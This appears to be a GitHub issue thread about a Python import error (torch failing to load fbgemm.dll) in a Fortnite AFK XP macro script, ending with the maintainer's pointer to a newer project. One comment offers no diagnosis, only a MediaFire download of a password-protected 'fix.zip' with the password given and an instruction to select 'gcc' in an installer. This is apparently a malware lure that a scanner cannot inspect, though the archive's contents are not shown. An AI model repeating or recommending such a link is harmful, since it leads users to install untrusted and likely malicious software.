### ISSUE TITLE
error

### ISSUE THREAD

**Issue by rgenshin4** [N4GR/Fortnite-Festival-AFK-XP#4]
IF run double click >

Traceback (most recent call last):
  File "C:\Users\RAHMAD\Pictures\Fortnite-Lego-AFK-XP-v2_1\Fortnite-Festival-Stage-AFK-XP-Macro\main.py", line 10, in <module>
    import easyocr
  File "C:\Users\RAHMAD\AppData\Local\Programs\Python\Python312\Lib\site-packages\easyocr\__init__.py", line 1, in <module>
    from .easyocr import Reader
  File "C:\Users\RAHMAD\AppData\Local\Programs\Python\Python312\Lib\site-packages\easyocr\easyocr.py", line 3, in <module>
    from .recognition import get_recognizer, get_text
  File "C:\Users\RAHMAD\AppData\Local\Programs\Python\Python312\Lib\site-packages\easyocr\recognition.py", line 2, in <module>
    import torch
  File "C:\Users\RAHMAD\AppData\Local\Programs\Python\Python312\Lib\site-packages\torch\__init__.py", line 148, in <module>
    raise err
OSError: [WinError 126] The specified module could not be found. Error loading "C:\Users\RAHMAD\AppData\Local\Programs\Python\Python312\Lib\site-packages\torch\lib\fbgemm.dll" or one of its dependencies.

if run as admin 

C:\Users\RAHMAD\AppData\Local\Programs\Python\Python312\python.exe: can't open file 'C:\\Windows\\System32\\main.py': [Errno 2] No such file or directory

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by N4GR** [comment]
Hello, this is a very late response to your comment - however, this script should no longer be used; I've built a script that runs from an .exe and is a lot more user-easy.

[Fortnite-AFP-XP-Master](https://github.com/N4GR/Fortnite-AFK-XP-Master)
